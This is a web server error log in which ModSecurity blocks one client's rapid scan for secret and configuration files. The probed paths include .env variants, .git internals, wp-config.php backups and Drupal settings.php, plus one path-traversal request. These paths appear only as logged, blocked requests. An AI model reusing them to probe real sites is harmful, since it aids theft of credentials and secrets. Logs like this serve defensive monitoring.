[Mon May 11 15:23:18.717424 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRqt2WtvoFr7xvGzU4AAAAJM"]
[Mon May 11 15:23:18.717534 2026] [security2:error] [pid 1319998:tid 1320014] [client 195.178.110.133:3976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYRqt2WtvoFr7xvGzU3wAAAI4"]
[Mon May 11 15:23:18.718366 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:4062] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYRlchVQ3tCn0m9OpZdAAAAQM"]
[Mon May 11 15:23:18.718517 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:4062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYRlchVQ3tCn0m9OpZdAAAAQM"]
[Mon May 11 15:23:18.718715 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:4062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYRlchVQ3tCn0m9OpZdAAAAQM"]
[Mon May 11 15:23:18.719839 2026] [security2:error] [pid 1320674:tid 1321055] [client 195.178.110.133:4028] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TCAAAAMw"]
[Mon May 11 15:23:18.719857 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:4004] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRuSQ-m-m0ukSShuCSQAAAVI"]
[Mon May 11 15:23:18.719963 2026] [security2:error] [pid 1320674:tid 1321055] [client 195.178.110.133:4028] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TCAAAAMw"]
[Mon May 11 15:23:18.719994 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:4004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRuSQ-m-m0ukSShuCSQAAAVI"]
[Mon May 11 15:23:18.720170 2026] [security2:error] [pid 1320674:tid 1321055] [client 195.178.110.133:4028] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TCAAAAMw"]
[Mon May 11 15:23:18.720201 2026] [security2:error] [pid 1319953:tid 1319973] [client 195.178.110.133:4004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYRuSQ-m-m0ukSShuCSQAAAVI"]
[Mon May 11 15:23:18.722062 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:3884] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRuJEyNRN152ArOSNNAAAAEc"]
[Mon May 11 15:23:18.722208 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:3884] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRuJEyNRN152ArOSNNAAAAEc"]
[Mon May 11 15:23:18.722403 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.133:3884] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYRuJEyNRN152ArOSNNAAAAEc"]
[Mon May 11 15:23:18.722784 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRqt2WtvoFr7xvGzU4gAAAJQ"]
[Mon May 11 15:23:18.722901 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRqt2WtvoFr7xvGzU4gAAAJQ"]
[Mon May 11 15:23:18.723085 2026] [security2:error] [pid 1319998:tid 1320020] [client 195.178.110.133:3898] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYRqt2WtvoFr7xvGzU4gAAAJQ"]
[Mon May 11 15:23:18.723731 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:3918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRqO9RdIr1DwxYR2TCQAAANc"]
[Mon May 11 15:23:18.723854 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:3918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRqO9RdIr1DwxYR2TCQAAANc"]
[Mon May 11 15:23:18.724037 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:3918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYRqO9RdIr1DwxYR2TCQAAANc"]
[Mon May 11 15:23:18.724788 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TCgAAAM0"]
[Mon May 11 15:23:18.724922 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TCgAAAM0"]
[Mon May 11 15:23:18.725113 2026] [security2:error] [pid 1320674:tid 1320702] [client 195.178.110.133:4060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqO9RdIr1DwxYR2TCgAAAM0"]
[Mon May 11 15:23:18.726827 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:3990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYRqy-5-wpj6Sx56aZEwAAABA"]
[Mon May 11 15:23:18.728867 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRlchVQ3tCn0m9OpZdQAAARE"]
[Mon May 11 15:23:18.729015 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRlchVQ3tCn0m9OpZdQAAARE"]
[Mon May 11 15:23:18.729238 2026] [security2:error] [pid 1319885:tid 1319920] [client 195.178.110.133:4042] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRlchVQ3tCn0m9OpZdQAAARE"]
[Mon May 11 15:23:18.721371 2026] [security2:error] [pid 1319998:tid 1320015] [client 195.178.110.133:4016] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRqt2WtvoFr7xvGzU4QAAAI8"]
[Mon May 11 15:23:18.730630 2026] [security2:error] [pid 1319998:tid 1320015] [client 195.178.110.133:4016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRqt2WtvoFr7xvGzU4QAAAI8"]
[Mon May 11 15:23:18.730941 2026] [security2:error] [pid 1319998:tid 1320015] [client 195.178.110.133:4016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRqt2WtvoFr7xvGzU4QAAAI8"]
[Mon May 11 15:23:18.735990 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYRqt2WtvoFr7xvGzU4wAAAJM"]
[Mon May 11 15:23:18.736199 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYRqt2WtvoFr7xvGzU4wAAAJM"]
[Mon May 11 15:23:18.736448 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.133:4038] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYRqt2WtvoFr7xvGzU4wAAAJM"]
[Mon May 11 15:23:18.737053 2026] [core:error] [pid 1319886:tid 1319931] [client 195.178.110.133:3964] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:18.738085 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYRuSQ-m-m0ukSShuCSwAAAVA"]
[Mon May 11 15:23:18.738273 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYRuSQ-m-m0ukSShuCSwAAAVA"]
[Mon May 11 15:23:18.738481 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.133:3954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYRuSQ-m-m0ukSShuCSwAAAVA"]
[Mon May 11 15:23:18.748534 2026] [:error] [pid 1319998:tid 1320021] [client 52.169.148.186:8229] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:18.754610 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:4056] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRuSQ-m-m0ukSShuCTQAAAUk"]
[Mon May 11 15:23:18.754734 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:4056] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRuSQ-m-m0ukSShuCTQAAAUk"]
[Mon May 11 15:23:18.754929 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:4056] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRuSQ-m-m0ukSShuCTQAAAUk"]
